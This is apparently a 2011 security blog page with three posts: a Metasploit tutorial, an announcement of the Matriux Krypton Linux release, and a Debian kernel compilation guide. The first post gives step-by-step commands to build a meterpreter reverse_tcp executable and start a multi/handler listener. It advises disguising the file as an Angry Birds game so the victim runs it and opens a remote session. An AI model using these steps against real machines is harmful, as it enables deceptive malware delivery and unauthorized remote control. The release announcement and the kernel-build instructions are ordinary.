Saturday, July 23, 2011

Hacking Windows with Metasploit

We will have a brief tutorial, on metasploit multi/hander exploit using a meterpreter payload of reverse_tcp.
Metasploit is a single most powerful open source tool available today for penetration testers. It can be used for developing and executing exploit code against remote target machine. A very famous and widely used penetration tester’s choice.
Metasploit Framework has 4 interfaces to work with
1.       MSF command line
2.       MSF console
3.       MSF GUI
4.       Armitage (recently included along with the framework)
There was also a web based version, which later became obsolete since it was buggy. Msfconsole is the most widely used and powerful mode of metasploit framework.
Metasploit in Matriux:
My tutorial would include Matriux as the Operating system - which can be found here -
Metasploit framework is found in Matriux Arsenal under Menu > Arsenal > Framework > Metasploit Framework.

Optionally it can be started from the terminal by typing msfconsole or msfgui based on what you prefer.

 This is how typically the Graphical interface looks like

However we would like to proceed with the msfconsole which I suggest is an extensive mode for using metasploit framework.
 we will have a brief article on metasploit multi/hander exploit using a meterpreter payload of reverse_tcp.
Start metasploit framework by typing “msfconsole” in the terminal and also type “msfupdate” to update the framework.

Now to start with multi/handler we have to generate the exe binded with reverse_tcp of meterpreter, that we would share with the target windows machines to exploit them. Open up a new terminal and type “msfpayload windows/meterpreter/reverse_tcp LHOST= x.x.x.x LPORT = 1080 X > /home/matriux/angrybird.exe
where, LHOST => Local HOST IP      LPORT = port to listen 

This will generate an angrybird.exe file in the HOME directory as shown here. This file is to be shared with the target machines that we intend to exploit (you can fool your target by changing the icon of the exe file generated and make it look like an angrybird game file ;))

After sharing the file with the target, we wait for the execution of that file. Meanwhile we start the reverse_tcp handler in our system. After starting msfconsole we start the metasploit process by ”use multi/handler”. And set the payload by typing “set payload windows/meterpreter/reverse_tcp

Now set the options LHOST and LPORT by typing “set LHOST localIP" and “SET LPORT porto to listen”. Set them to match with the exe payload we generated earlier, option you can check the options required by typing “show options

We are now ready to exploit our target machines, (here I set up a windows XP machine ), initiate the exploit listening process by typing “exploit” and wait for the target machine to execute the angrybird.exe  as soon as the victim clicks on the executable file it will initialize the meterpreter session with the reverse tcp.

 BINGO we are done!!! We successfully exploited a Windows XP machine with multi/handler

 And have you noticed? We just showed you a preview of Matriux’s upcoming version ;) Ch33rs!!!

This article was earlier published by me in CHmag in the July 2011 Issue -

Thursday, July 21, 2011

Matriux Krypton Release announcement

Matriux has announced the release of Matriux Krypton its upcoming release, a post in their announcement read,

"Matriux Krypton Release

Matriux Krypton is set to release on August 15th 2011.

Matriux - a project that which launched its first version of Linux Distribution for Hackers, Forensic Experts and Security professionals first at ClubHack , Dec 5th 2009 which was a Ubuntu based KDE distribution code named Lithium with an interesting Arsenal ( application list) for the security professionals and forensic experts also announced a second version the next year at same gathering ClubHack 2010 Dec 4th code named Xenon a Gnome flavor based on Ubuntu, is now proud to announce a upcoming release code name Krypton.

Krypton is been a talk since then., because it is the first linux distribution that is going to be based directly on Debian featuring more tools, extra stability and security.

Features :

* Very own kernel 2.6.39 compiled with a greater support and stability., yes we mean it !
* More than 300 security tools,  however quality is given priority than the quantity.
* Forensics are not neglected , given an equal importance.
* The very first distribution based directly on Debian
* More stable
* More swift and easy
* Very own installer for easy installation of the Live CD. ( MID)
* Build update tool MUT ( Matriux Update tool).
* Lighter and better desktop environment with Gnome. ( LXDE to soon follow)
* Simple, however strong and elegant!
* Applications from Matriux team that help you in hacking!!

Behold the wait!!! For the fruit to ripe , you ought to wait !"

Official annoucement can be found here
Now its the wait till August 15th :)

Monday, July 18, 2011

How to Compile a Kernel for Debian ( Squeeze)

Every one wonders about how to compile a kernel ? On contrary never checks to compile ones own.. I say its very easy..


ABC of Linux - yes you just need to know the basics of Linux, there is no rocket science

Building the kernel: (Note same steps hold for Ubuntu)

We basically build a .deb package that can be installed into the Debian system

Step 1:

aptitude update && aptitude install dkms kernel-package libncurses5-dev wget bzip2 fake-root build-essential
 This will install all the packages required to compile our kernel

Step 2:

Go to and get the latest stable kernel package. ( During the post latest available stable kernel was )., so here is what I did . Made a directory named kernel for easy understanding
mkdir kernel
cd kernel/
Step 3:

Extract the package and move to its directory
tar xvf linux-
cd linux- 
Step 4: ( Only if you wish to patch the kernel with aufs modules, else you can skip this step)

The following commands will patch the kernel source with auf2 modules
git clone aufs
cd aufs
git checkout -q aufs 2.1
cd ..
patch -f -p1 < aufs/aufs2-kbuild.patch
patch -f -p1 < aufs/aufs2-base.patch
patch -f -p1 < aufs/aufs2-standalone.patch
cp -frv aufs/Documentation/* Documentation/
cp -frv aufs/fs/* fs/
cp -fv aufs/include/linux/aufs_type.h include/linux/
Follow these steps as provided above else you may fail to load the aufs configurations

Step 5:

Now lets start the build process of our kernel
make clean and make mrproper
Step 6 i: ( if you want to have the same config of your existing kernel)

Configuring the kernel :

If you wish to have the same config of your previous existing kernel follow the steps

cp /boot/config-`uname -r` ./.config 
this will load the existing kernel config file

now type

make menuconfig
Step 6 ii : ( if you want to have a custom config of your own)

Configuring the kernel :

copy your custom made .config to the current directory

and type
make menuconfig

Step 7:

You will now be displayed with a screen

Go to Load an Alternate Configuration File and choose .config (this is the .config file we copied to our directory in step 6) and press OK.

Step 8:

Now we will make our own custom kernel

make-kpkg clean
fakeroot make-kpkg --initrd --stem extraversion
  --revision revision  --append-to-version=-customversion kernel_image kernel_headers
You need to give these 3 values of your own in the above command:
  extraversion - give your own extraversion for kernel
 revision- the revision you want the kernel to be
customversion   - the custom revision of the kernel "

And sit back for a couple of hours since it takes time

After successful compilation of the kernel you will see two .deb packages in the ../ folder
1. Kernel image file .deb
2. Kernel Header file .deb

Step 9:

Installing the kernel we compiled

dpkg -i linux-image-2.6.39*
dpkg -i linux-headers-2.6.39*

(you may type the whole file name as dpkg -i linux-image- depending on whatever is generated in your case) .

Restart your system and you should see your kernel in the grub menu or else verify the kernel version with

uname -a

Congrats you have successfully compiled the Linux kernel for Debian and its derivatives :))

Note:If you face any issues comment this post and i will reply you.